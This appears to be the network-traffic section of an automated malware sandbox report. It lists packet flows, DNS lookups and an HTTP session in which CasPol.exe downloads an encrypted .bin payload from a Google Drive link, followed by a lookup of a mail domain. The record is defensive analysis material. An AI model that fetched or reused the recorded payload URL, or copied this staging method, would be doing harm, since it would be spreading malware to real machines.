                                                                                                                      Jul 8, 2022 06:01:38.391971111 CEST49738443192.168.11.20142.250.185.225
                                                                                                                      Jul 8, 2022 06:01:38.392050028 CEST44349738142.250.185.225192.168.11.20
                                                                                                                      Jul 8, 2022 06:01:38.392173052 CEST44349738142.250.185.225192.168.11.20
                                                                                                                      Jul 8, 2022 06:01:38.392353058 CEST49738443192.168.11.20142.250.185.225
                                                                                                                      Jul 8, 2022 06:01:38.392381907 CEST44349738142.250.185.225192.168.11.20
                                                                                                                      Jul 8, 2022 06:01:38.392390013 CEST49738443192.168.11.20142.250.185.225
                                                                                                                      Jul 8, 2022 06:01:38.392659903 CEST49738443192.168.11.20142.250.185.225
                                                                                                                      Jul 8, 2022 06:01:38.392936945 CEST44349738142.250.185.225192.168.11.20
                                                                                                                      Jul 8, 2022 06:01:38.393136024 CEST44349738142.250.185.225192.168.11.20
                                                                                                                      Jul 8, 2022 06:01:38.393178940 CEST49738443192.168.11.20142.250.185.225
                                                                                                                      Jul 8, 2022 06:01:38.393220901 CEST44349738142.250.185.225192.168.11.20
                                                                                                                      Jul 8, 2022 06:01:38.393352985 CEST49738443192.168.11.20142.250.185.225
                                                                                                                      Jul 8, 2022 06:01:38.393526077 CEST49738443192.168.11.20142.250.185.225
                                                                                                                      Jul 8, 2022 06:01:38.393548965 CEST44349738142.250.185.225192.168.11.20
                                                                                                                      Jul 8, 2022 06:01:38.393882990 CEST49738443192.168.11.20142.250.185.225
                                                                                                                      Jul 8, 2022 06:01:38.393914938 CEST44349738142.250.185.225192.168.11.20
                                                                                                                      Jul 8, 2022 06:01:38.393942118 CEST44349738142.250.185.225192.168.11.20
                                                                                                                      Jul 8, 2022 06:01:38.394117117 CEST49738443192.168.11.20142.250.185.225
                                                                                                                      Jul 8, 2022 06:01:38.394157887 CEST44349738142.250.185.225192.168.11.20
                                                                                                                      Jul 8, 2022 06:01:38.394169092 CEST49738443192.168.11.20142.250.185.225
                                                                                                                      Jul 8, 2022 06:01:38.394184113 CEST44349738142.250.185.225192.168.11.20
                                                                                                                      Jul 8, 2022 06:01:38.394203901 CEST44349738142.250.185.225192.168.11.20
                                                                                                                      Jul 8, 2022 06:01:38.394412994 CEST49738443192.168.11.20142.250.185.225
                                                                                                                      Jul 8, 2022 06:01:38.394629955 CEST44349738142.250.185.225192.168.11.20
                                                                                                                      Jul 8, 2022 06:01:38.394802094 CEST49738443192.168.11.20142.250.185.225
                                                                                                                      Jul 8, 2022 06:01:38.394804001 CEST44349738142.250.185.225192.168.11.20
                                                                                                                      Jul 8, 2022 06:01:38.394840002 CEST44349738142.250.185.225192.168.11.20
                                                                                                                      Jul 8, 2022 06:01:38.394993067 CEST49738443192.168.11.20142.250.185.225
                                                                                                                      Jul 8, 2022 06:01:38.395378113 CEST44349738142.250.185.225192.168.11.20
                                                                                                                      Jul 8, 2022 06:01:38.395565033 CEST44349738142.250.185.225192.168.11.20
                                                                                                                      Jul 8, 2022 06:01:38.395656109 CEST44349738142.250.185.225192.168.11.20
                                                                                                                      Jul 8, 2022 06:01:38.395771980 CEST49738443192.168.11.20142.250.185.225
                                                                                                                      Jul 8, 2022 06:01:38.395807028 CEST44349738142.250.185.225192.168.11.20
                                                                                                                      Jul 8, 2022 06:01:38.395817041 CEST49738443192.168.11.20142.250.185.225
                                                                                                                      Jul 8, 2022 06:01:38.395941019 CEST49738443192.168.11.20142.250.185.225
                                                                                                                      Jul 8, 2022 06:01:38.396136045 CEST49738443192.168.11.20142.250.185.225
                                                                                                                      Jul 8, 2022 06:01:38.396204948 CEST44349738142.250.185.225192.168.11.20
                                                                                                                      Jul 8, 2022 06:01:38.396393061 CEST44349738142.250.185.225192.168.11.20
                                                                                                                      Jul 8, 2022 06:01:38.396399975 CEST49738443192.168.11.20142.250.185.225
                                                                                                                      Jul 8, 2022 06:01:38.396428108 CEST44349738142.250.185.225192.168.11.20
                                                                                                                      Jul 8, 2022 06:01:38.396624088 CEST49738443192.168.11.20142.250.185.225
                                                                                                                      Jul 8, 2022 06:01:38.396646023 CEST44349738142.250.185.225192.168.11.20
                                                                                                                      Jul 8, 2022 06:01:38.396862984 CEST49738443192.168.11.20142.250.185.225
                                                                                                                      Jul 8, 2022 06:01:38.397118092 CEST44349738142.250.185.225192.168.11.20
                                                                                                                      Jul 8, 2022 06:01:38.397301912 CEST44349738142.250.185.225192.168.11.20
                                                                                                                      Jul 8, 2022 06:01:38.397402048 CEST44349738142.250.185.225192.168.11.20
                                                                                                                      Jul 8, 2022 06:01:38.397556067 CEST49738443192.168.11.20142.250.185.225
                                                                                                                      Jul 8, 2022 06:01:38.397579908 CEST44349738142.250.185.225192.168.11.20
                                                                                                                      Jul 8, 2022 06:01:38.397588015 CEST49738443192.168.11.20142.250.185.225
                                                                                                                      Jul 8, 2022 06:01:38.397749901 CEST49738443192.168.11.20142.250.185.225
                                                                                                                      Jul 8, 2022 06:01:38.397927999 CEST44349738142.250.185.225192.168.11.20
                                                                                                                      Jul 8, 2022 06:01:38.397943974 CEST49738443192.168.11.20142.250.185.225
                                                                                                                      Jul 8, 2022 06:01:38.397969961 CEST44349738142.250.185.225192.168.11.20
                                                                                                                      Jul 8, 2022 06:01:38.398137093 CEST49738443192.168.11.20142.250.185.225
                                                                                                                      Jul 8, 2022 06:01:38.398168087 CEST44349738142.250.185.225192.168.11.20
                                                                                                                      Jul 8, 2022 06:01:38.398175001 CEST49738443192.168.11.20142.250.185.225
                                                                                                                      Jul 8, 2022 06:01:38.398188114 CEST44349738142.250.185.225192.168.11.20
                                                                                                                      Jul 8, 2022 06:01:38.398426056 CEST49738443192.168.11.20142.250.185.225
                                                                                                                      Jul 8, 2022 06:01:38.398920059 CEST44349738142.250.185.225192.168.11.20
                                                                                                                      Jul 8, 2022 06:01:38.399111986 CEST44349738142.250.185.225192.168.11.20
                                                                                                                      Jul 8, 2022 06:01:38.399115086 CEST49738443192.168.11.20142.250.185.225
                                                                                                                      Jul 8, 2022 06:01:38.399178028 CEST44349738142.250.185.225192.168.11.20
                                                                                                                      Jul 8, 2022 06:01:38.399272919 CEST49738443192.168.11.20142.250.185.225
                                                                                                                      Jul 8, 2022 06:01:38.399445057 CEST49738443192.168.11.20142.250.185.225
                                                                                                                      Jul 8, 2022 06:01:38.399466038 CEST44349738142.250.185.225192.168.11.20
                                                                                                                      Jul 8, 2022 06:01:38.399693012 CEST49738443192.168.11.20142.250.185.225
                                                                                                                      Jul 8, 2022 06:01:38.399727106 CEST44349738142.250.185.225192.168.11.20
                                                                                                                      Jul 8, 2022 06:01:38.399755955 CEST44349738142.250.185.225192.168.11.20
                                                                                                                      Jul 8, 2022 06:01:38.399931908 CEST44349738142.250.185.225192.168.11.20
                                                                                                                      Jul 8, 2022 06:01:38.400012970 CEST49738443192.168.11.20142.250.185.225
                                                                                                                      Jul 8, 2022 06:01:38.400026083 CEST44349738142.250.185.225192.168.11.20
                                                                                                                      Jul 8, 2022 06:01:38.400047064 CEST49738443192.168.11.20142.250.185.225
                                                                                                                      Jul 8, 2022 06:01:38.400069952 CEST44349738142.250.185.225192.168.11.20
                                                                                                                      Jul 8, 2022 06:01:38.400182009 CEST49738443192.168.11.20142.250.185.225
                                                                                                                      Jul 8, 2022 06:01:38.400372982 CEST49738443192.168.11.20142.250.185.225
                                                                                                                      Jul 8, 2022 06:01:38.400465012 CEST44349738142.250.185.225192.168.11.20
                                                                                                                      Jul 8, 2022 06:01:38.400655031 CEST44349738142.250.185.225192.168.11.20
                                                                                                                      Jul 8, 2022 06:01:38.400686979 CEST49738443192.168.11.20142.250.185.225
                                                                                                                      Jul 8, 2022 06:01:38.400722980 CEST44349738142.250.185.225192.168.11.20
                                                                                                                      Jul 8, 2022 06:01:38.400825977 CEST44349738142.250.185.225192.168.11.20
                                                                                                                      Jul 8, 2022 06:01:38.400918007 CEST49738443192.168.11.20142.250.185.225
                                                                                                                      Jul 8, 2022 06:01:38.400934935 CEST49738443192.168.11.20142.250.185.225
                                                                                                                      Jul 8, 2022 06:01:38.400950909 CEST44349738142.250.185.225192.168.11.20
                                                                                                                      Jul 8, 2022 06:01:38.401108980 CEST49738443192.168.11.20142.250.185.225
                                                                                                                      Jul 8, 2022 06:01:38.401304007 CEST49738443192.168.11.20142.250.185.225
                                                                                                                      Jul 8, 2022 06:01:38.401365995 CEST44349738142.250.185.225192.168.11.20
                                                                                                                      Jul 8, 2022 06:01:38.401562929 CEST44349738142.250.185.225192.168.11.20
                                                                                                                      Jul 8, 2022 06:01:38.401654959 CEST49738443192.168.11.20142.250.185.225
                                                                                                                      Jul 8, 2022 06:01:38.401664972 CEST44349738142.250.185.225192.168.11.20
                                                                                                                      Jul 8, 2022 06:01:38.401685953 CEST44349738142.250.185.225192.168.11.20
                                                                                                                      Jul 8, 2022 06:01:38.401820898 CEST49738443192.168.11.20142.250.185.225
                                                                                                                      Jul 8, 2022 06:01:38.401840925 CEST44349738142.250.185.225192.168.11.20
                                                                                                                      Jul 8, 2022 06:01:38.401992083 CEST49738443192.168.11.20142.250.185.225
                                                                                                                      Jul 8, 2022 06:01:38.402019978 CEST44349738142.250.185.225192.168.11.20
                                                                                                                      Jul 8, 2022 06:01:38.402026892 CEST49738443192.168.11.20142.250.185.225
                                                                                                                      Jul 8, 2022 06:01:38.402180910 CEST49738443192.168.11.20142.250.185.225
                                                                                                                      Jul 8, 2022 06:01:38.402441025 CEST44349738142.250.185.225192.168.11.20
                                                                                                                      Jul 8, 2022 06:01:38.402697086 CEST44349738142.250.185.225192.168.11.20
                                                                                                                      Jul 8, 2022 06:01:38.402719975 CEST49738443192.168.11.20142.250.185.225
                                                                                                                      Jul 8, 2022 06:01:38.402765989 CEST44349738142.250.185.225192.168.11.20
                                                                                                                      Jul 8, 2022 06:01:38.402920961 CEST44349738142.250.185.225192.168.11.20
                                                                                                                      Jul 8, 2022 06:01:38.403059006 CEST44349738142.250.185.225192.168.11.20
                                                                                                                      Jul 8, 2022 06:01:38.403074026 CEST49738443192.168.11.20142.250.185.225
                                                                                                                      Jul 8, 2022 06:01:38.403105021 CEST44349738142.250.185.225192.168.11.20
                                                                                                                      Jul 8, 2022 06:01:38.403112888 CEST49738443192.168.11.20142.250.185.225
                                                                                                                      Jul 8, 2022 06:01:38.403254986 CEST44349738142.250.185.225192.168.11.20
                                                                                                                      Jul 8, 2022 06:01:38.403331041 CEST49738443192.168.11.20142.250.185.225
                                                                                                                      Jul 8, 2022 06:01:38.403351068 CEST49738443192.168.11.20142.250.185.225
                                                                                                                      Jul 8, 2022 06:01:38.403361082 CEST44349738142.250.185.225192.168.11.20
                                                                                                                      Jul 8, 2022 06:01:38.403362036 CEST49738443192.168.11.20142.250.185.225
                                                                                                                      Jul 8, 2022 06:01:38.403388023 CEST44349738142.250.185.225192.168.11.20
                                                                                                                      Jul 8, 2022 06:01:38.403490067 CEST49738443192.168.11.20142.250.185.225
                                                                                                                      Jul 8, 2022 06:01:38.403544903 CEST44349738142.250.185.225192.168.11.20
                                                                                                                      Jul 8, 2022 06:01:38.403661013 CEST49738443192.168.11.20142.250.185.225
                                                                                                                      Jul 8, 2022 06:01:38.403692007 CEST44349738142.250.185.225192.168.11.20
                                                                                                                      Jul 8, 2022 06:01:38.403702974 CEST49738443192.168.11.20142.250.185.225
                                                                                                                      Jul 8, 2022 06:01:38.403726101 CEST44349738142.250.185.225192.168.11.20
                                                                                                                      Jul 8, 2022 06:01:38.403852940 CEST49738443192.168.11.20142.250.185.225
                                                                                                                      Jul 8, 2022 06:01:38.403878927 CEST44349738142.250.185.225192.168.11.20
                                                                                                                      Jul 8, 2022 06:01:38.404046059 CEST49738443192.168.11.20142.250.185.225
                                                                                                                      Jul 8, 2022 06:01:38.404071093 CEST44349738142.250.185.225192.168.11.20
                                                                                                                      Jul 8, 2022 06:01:38.404217958 CEST49738443192.168.11.20142.250.185.225
                                                                                                                      Jul 8, 2022 06:01:38.404264927 CEST44349738142.250.185.225192.168.11.20
                                                                                                                      Jul 8, 2022 06:01:38.404405117 CEST49738443192.168.11.20142.250.185.225
                                                                                                                      Jul 8, 2022 06:01:38.404429913 CEST44349738142.250.185.225192.168.11.20
                                                                                                                      Jul 8, 2022 06:01:38.404438019 CEST49738443192.168.11.20142.250.185.225
                                                                                                                      Jul 8, 2022 06:01:38.404450893 CEST44349738142.250.185.225192.168.11.20
                                                                                                                      Jul 8, 2022 06:01:38.404457092 CEST49738443192.168.11.20142.250.185.225
                                                                                                                      Jul 8, 2022 06:01:38.404652119 CEST49738443192.168.11.20142.250.185.225
                                                                                                                      Jul 8, 2022 06:01:38.404670000 CEST49738443192.168.11.20142.250.185.225
                                                                                                                      Jul 8, 2022 06:01:38.404680014 CEST49738443192.168.11.20142.250.185.225
                                                                                                                      Jul 8, 2022 06:01:38.404732943 CEST44349738142.250.185.225192.168.11.20
                                                                                                                      Jul 8, 2022 06:01:38.404953003 CEST44349738142.250.185.225192.168.11.20
                                                                                                                      Jul 8, 2022 06:01:38.405035973 CEST49738443192.168.11.20142.250.185.225
                                                                                                                      Jul 8, 2022 06:01:38.405051947 CEST44349738142.250.185.225192.168.11.20
                                                                                                                      Jul 8, 2022 06:01:38.405072927 CEST44349738142.250.185.225192.168.11.20
                                                                                                                      Jul 8, 2022 06:01:38.405122995 CEST49738443192.168.11.20142.250.185.225
                                                                                                                      Jul 8, 2022 06:01:38.405241013 CEST44349738142.250.185.225192.168.11.20
                                                                                                                      Jul 8, 2022 06:01:38.405297041 CEST49738443192.168.11.20142.250.185.225
                                                                                                                      Jul 8, 2022 06:01:38.405329943 CEST44349738142.250.185.225192.168.11.20
                                                                                                                      Jul 8, 2022 06:01:38.405421019 CEST44349738142.250.185.225192.168.11.20
                                                                                                                      Jul 8, 2022 06:01:38.405502081 CEST49738443192.168.11.20142.250.185.225
                                                                                                                      Jul 8, 2022 06:01:38.405514002 CEST49738443192.168.11.20142.250.185.225
                                                                                                                      Jul 8, 2022 06:01:38.405517101 CEST44349738142.250.185.225192.168.11.20
                                                                                                                      Jul 8, 2022 06:01:38.405539036 CEST44349738142.250.185.225192.168.11.20
                                                                                                                      Jul 8, 2022 06:01:38.405700922 CEST49738443192.168.11.20142.250.185.225
                                                                                                                      Jul 8, 2022 06:01:38.405716896 CEST44349738142.250.185.225192.168.11.20
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jul 8, 2022 06:01:37.175949097 CEST | 63198 | 53 | 192.168.11.20 | 1.1.1.1
Jul 8, 2022 06:01:37.184885025 CEST | 53 | 63198 | 1.1.1.1 | 192.168.11.20
Jul 8, 2022 06:01:38.035819054 CEST | 54695 | 53 | 192.168.11.20 | 1.1.1.1
Jul 8, 2022 06:01:38.068016052 CEST | 53 | 54695 | 1.1.1.1 | 192.168.11.20
Jul 8, 2022 06:01:51.200717926 CEST | 65345 | 53 | 192.168.11.20 | 1.1.1.1
Jul 8, 2022 06:01:51.301168919 CEST | 53 | 65345 | 1.1.1.1 | 192.168.11.20
Jul 8, 2022 06:01:51.697470903 CEST | 61274 | 53 | 192.168.11.20 | 1.1.1.1

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Jul 8, 2022 06:01:37.175949097 CEST | 192.168.11.20 | 1.1.1.1 | 0xd655 | Standard query (0) | drive.google.com | A (IP address) | IN (0x0001)
Jul 8, 2022 06:01:38.035819054 CEST | 192.168.11.20 | 1.1.1.1 | 0xdd96 | Standard query (0) | doc-0k-0s-docs.googleusercontent.com | A (IP address) | IN (0x0001)
Jul 8, 2022 06:01:51.200717926 CEST | 192.168.11.20 | 1.1.1.1 | 0xddfc | Standard query (0) | mail.gonzalezestalote.com | A (IP address) | IN (0x0001)
Jul 8, 2022 06:01:51.697470903 CEST | 192.168.11.20 | 1.1.1.1 | 0x760b | Standard query (0) | x1.i.lencr.org | A (IP address) | IN (0x0001)

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jul 8, 2022 06:01:37.184885025 CEST | 1.1.1.1 | 192.168.11.20 | 0xd655 | No error (0) | drive.google.com | | 142.250.186.78 | A (IP address) | IN (0x0001)
Jul 8, 2022 06:01:38.068016052 CEST | 1.1.1.1 | 192.168.11.20 | 0xdd96 | No error (0) | doc-0k-0s-docs.googleusercontent.com | googlehosted.l.googleusercontent.com | | CNAME (Canonical name) | IN (0x0001)
Jul 8, 2022 06:01:38.068016052 CEST | 1.1.1.1 | 192.168.11.20 | 0xdd96 | No error (0) | googlehosted.l.googleusercontent.com | | 142.250.185.225 | A (IP address) | IN (0x0001)
Jul 8, 2022 06:01:51.301168919 CEST | 1.1.1.1 | 192.168.11.20 | 0xddfc | No error (0) | mail.gonzalezestalote.com | gonzalezestalote.com | | CNAME (Canonical name) | IN (0x0001)
Jul 8, 2022 06:01:51.301168919 CEST | 1.1.1.1 | 192.168.11.20 | 0xddfc | No error (0) | gonzalezestalote.com | | 185.101.224.45 | A (IP address) | IN (0x0001)
Jul 8, 2022 06:01:51.706505060 CEST | 1.1.1.1 | 192.168.11.20 | 0x760b | No error (0) | x1.i.lencr.org | crl.root-x1.letsencrypt.org.edgekey.net | | CNAME (Canonical name) | IN (0x0001)
                                                                                                                      • drive.google.com
                                                                                                                      • doc-0k-0s-docs.googleusercontent.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.11.20 | 49737 | 142.250.186.78 | 443 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Timestamp | kBytes transferred | Direction | Data
2022-07-08 04:01:37 UTC | 0 | OUT | GET /uc?export=download&id=1Pd9u4MvCgkvBmkO27OGhmEo8sWZCKhPL HTTP/1.1
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                      Host: drive.google.com
                                                                                                                      Cache-Control: no-cache
2022-07-08 04:01:37 UTC | 0 | IN | HTTP/1.1 303 See Other
                                                                                                                      Content-Type: application/binary
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Fri, 08 Jul 2022 04:01:37 GMT
                                                                                                                      Location: https://doc-0k-0s-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/nh1k27nak7lbv5aqag412s4mssudfrf2/1657252875000/16799943050313356466/*/1Pd9u4MvCgkvBmkO27OGhmEo8sWZCKhPL?e=download&uuid=f3d0ce5e-3a8f-48f4-9bee-bdf0b7c9b76e
                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Content-Security-Policy: script-src 'nonce-6mgi7FsHXghSv2zqdiYiHw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                      Server: ESF
                                                                                                                      Content-Length: 0
                                                                                                                      X-XSS-Protection: 0
                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                      Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.11.20 | 49738 | 142.250.185.225 | 443 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Timestamp | kBytes transferred | Direction | Data
2022-07-08 04:01:38 UTC | 1 | OUT | GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/nh1k27nak7lbv5aqag412s4mssudfrf2/1657252875000/16799943050313356466/*/1Pd9u4MvCgkvBmkO27OGhmEo8sWZCKhPL?e=download&uuid=f3d0ce5e-3a8f-48f4-9bee-bdf0b7c9b76e HTTP/1.1
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Host: doc-0k-0s-docs.googleusercontent.com
                                                                                                                      Connection: Keep-Alive
2022-07-08 04:01:38 UTC | 2 | IN | HTTP/1.1 200 OK
                                                                                                                      X-GUploader-UploadID: ADPycdv4sm9JxdWzfA0ZDVpjH-60MVQh6IKZ2uQ3mEhj4xVgR9HSjFGYIrQQ6RvC1P6CRbvqd988n0BD7xHH-q7kCtvZbg
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Credentials: false
                                                                                                                      Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Version, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, x-goog-ext-124712974-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, X-Goog-Api-Key, X-HTTP-Method-Override, 
X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Ariane-Xsrf-Token, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-Interop-Cohorts, X-Goog-Meeting-Interop-Type, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-ViewerInfo, X-Goog-Meeting-Viewer-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment, x-goog-greenenergyuserappservice-metadata
                                                                                                                      Access-Control-Allow-Methods: GET,OPTIONS
                                                                                                                      Content-Type: application/octet-stream
                                                                                                                      Content-Disposition: attachment;filename="slims4417_qsyFfBymE214.bin";filename*=UTF-8''slims4417_qsyFfBymE214.bin
                                                                                                                      Content-Length: 214592
                                                                                                                      Date: Fri, 08 Jul 2022 04:01:38 GMT
                                                                                                                      Expires: Fri, 08 Jul 2022 04:01:38 GMT
                                                                                                                      Cache-Control: private, max-age=0
                                                                                                                      X-Goog-Hash: crc32c=uwAj6w==
                                                                                                                      Server: UploadServer
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                      Connection: close
                                                                                                                      Data Ascii: 5u}v/b$[nB{XxD|q:4-uhp.;0Jf2/W.R[.[5r|RSM8_@dE[1Fqk+#4?,YC}]0^vYkHQD\$g5fGxK6ZHY"hT4uw>F
                                                                                                                      2022-07-08 04:01:38 UTC49INData Raw: d9 2f cf 86 03 38 73 db ed fc 62 7a 18 97 22 51 b8 76 99 18 76 08 35 08 6e bf be db 3c 15 65 52 a2 53 8e 8b 47 0a 61 0c aa 86 65 ea 37 63 4b 99 e0 08 5f 32 47 b2 ed 34 81 ec 2a 49 84 51 6e e9 b8 7c 5b 83 c5 31 c1 76 e5 a6 06 90 8b cd 9e 33 7b af b5 80 00 41 bc 13 b2 e5 c1 55 80 94 be eb 42 53 05 25 07 2f 52 5a b1 ff b9 35 4a 2e 82 1b 88 41 7d aa 9a cb 87 2f fc c6 71 61 9d 33 3f 6d 2c d1 5d af 2a c5 0f 12 ca a1 e8 a3 60 f9 41 24 dc fe 27 f1 26 38 68 4c 7e 0f 45 67 39 44 4e a4 c6 23 20 db 2b f3 57 4f 9b 8e 96 5c 76 63 34 a2 f7 51 65 72 00 41 2c 85 87 2f 52 5c 12 31 54 85 85 1f 1c 27 69 dc df c8 2c 97 39 c3 eb 48 eb 82 97 09 ab 5f e7 cc 90 65 0f b5 83 5e 3b 73 df b5 49 ec a4 b0 31 ed 70 30 30 95 aa 8b 38 d7 84 07 64 c1 68 a8 87 50 06 8d a1 58 b7 d6 7c 28 f0
                                                                                                                      Data Ascii: /8sbz"Qvv5n<eRSGae7cK_2G4*IQn|[1v3{AUBS%/RZ5J.A}/qa3?m,]*`A$'&8hL~Eg9DN# +WO\vc4QerA,/R\1T'i,9H_e^;sI1p008dhPX|(
                                                                                                                      2022-07-08 04:01:38 UTC50INData Raw: 93 17 cd 3b d5 6a b3 93 8f bb 3b 26 b2 4c 72 0b 75 71 a9 84 0d ae cb 24 6a 0f 06 46 d0 39 26 f9 2d 58 d8 05 40 3b ec f8 a0 a6 af 42 a0 42 a5 6d f7 fa b5 b8 13 0a 47 61 e0 21 1b f1 72 12 ed c1 e5 4c 44 21 76 eb 41 00 66 d2 86 1c cd 92 f0 4d d0 0d b4 d2 92 98 7a 3b e0 a8 b2 4c ac dd 9c 07 21 c4 3d c8 99 18 3e 50 dc ed e6 12 3c e6 96 04 a6 82 be fe 19 76 0a 1c 23 af bf be 91 fc 13 67 7a 4e 72 87 01 45 22 c4 cb aa 8c 74 91 cb fb 4b 93 f9 59 6f be 68 b4 e7 2a 8e dc 3a 51 18 71 71 e7 47 6e 53 9c d1 24 cf fd ee a1 18 b8 77 c6 81 36 79 a5 a3 80 2b 48 b5 f5 9b 3f cb 44 86 9d 0c d6 6b 23 c7 37 08 25 52 77 bf c4 28 e2 67 23 99 06 b0 c6 2b c3 65 34 72 21 c7 cc 11 b9 8d 3c 2a 70 f0 bf a8 d3 3e 1f 9c 16 dc b1 c4 39 d7 96 91 0d 89 f6 34 d2 22 f5 e2 63 7e 0e 57 7f 09 5e
                                                                                                                      Data Ascii: ;j;&Lruq$jF9&-X@;BBmGa!rLD!vAfMz;L!=>P<v#gzNrE"tKYoh*:QqqGnS$w6y+H?Dk#7%Rw(g#+e4r!<*p>94"c~W^
